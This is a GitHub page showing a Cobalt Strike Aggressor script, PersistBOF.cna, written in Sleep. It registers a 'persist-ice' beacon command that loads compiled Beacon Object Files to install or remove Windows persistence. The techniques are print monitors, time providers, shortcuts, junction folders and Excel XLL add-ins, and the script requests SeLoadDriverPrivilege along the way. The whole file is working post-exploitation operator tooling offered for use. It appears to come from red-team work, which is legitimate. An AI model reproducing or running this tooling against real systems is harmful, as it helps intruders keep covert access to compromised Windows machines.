-
Notifications
You must be signed in to change notification settings - Fork 44
/
Copy pathPersistBOF.cna
119 lines (98 loc) · 2.41 KB
/
PersistBOF.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
beacon_command_register(
"persist-ice",
"A set of persistence techniques to appeal the masses",
"Synopsis: persist-ice [PrintMon, TimeProv, Shortcut, Junction, Xll] [persist or clean] [key/folder name] [dll / lnk exe name]");
alias persist-ice {
$data = substr($0, 12);
@args = split(' ', $data);
local('$_type $_action $_registryKeyName $_dllName $_action_int $_clsid $_bofPath');
# map args to variables
$_type = @args[0];
$_action = @args[1];
$_registryKeyName = @args[2];
$_dllName = @args[3];
if(size(@args) > 4 )
{
$_clsid = @args[4];
}
if($_action iswm "persist")
{
$_action_int = 0;
}
else if($_action iswm "clean")
{
$_action_int = 1;
}
else
{
berror($1,"Error: Not a valid argument");
return;
}
#Determine correct type of persistence
if($_type iswm "PrintMon")
{
# Make sure we have the right permissions
if(!-isadmin $1)
{
berror($1,"Error: Must be admin for this persistence mechanism");
return;
}
#Need these privilieges to load a new print monitor
bgetprivs($1, "SeLoadDriverPrivilege");
# read in the right BOF file
$_bofPath = "persist-ice-monitor.o";
}
else if($_type iswm "Xll")
{
$_bofPath = "persist-ice-xll.o";
}
else if($_type iswm "TimeProv")
{
# Make sure we have the right permissions
if(!-isadmin $1)
{
berror($1,"Error: Must be admin for this persistence mechanism");
return;
}
$_bofPath = "persist-ice-time.o";
}
else if($_type iswm "Shortcut")
{
if($_action_int == 1)
{
berror($1,"Error: This function does not support automatic cleanup");
return;
}
$_bofPath = "persist-ice-shortcut.o";
}
else if($_type iswm "Junction")
{
$_bofPath = "persist-ice-junction.o";
}
else
{
berror($1,"Error: Not a valid type of persistence");
return;
}
#read in the correct bof
$handle = openf(script_resource($_bofPath));
$bof = readb($handle, -1);
closef($handle);
if(strlen($bof) < 1)
{
berror($1,"Error: BOF bin could not be found. Please ensure the compiled BOF (.o file) exists in the same folder as this aggressor script");
return;
}
# pack our arguments
if(size(@args) > 4 )
{
$bofArgs = bof_pack($1, "iZZZ", $_action_int, $_registryKeyName, $_dllName, $_clsid);
}
else
{
$bofArgs = bof_pack($1, "iZZ", $_action_int, $_registryKeyName, $_dllName);
}
btask($1, "Running Persist-ICE");
# execute it.
beacon_inline_execute($1, $bof, "go", $bofArgs);
}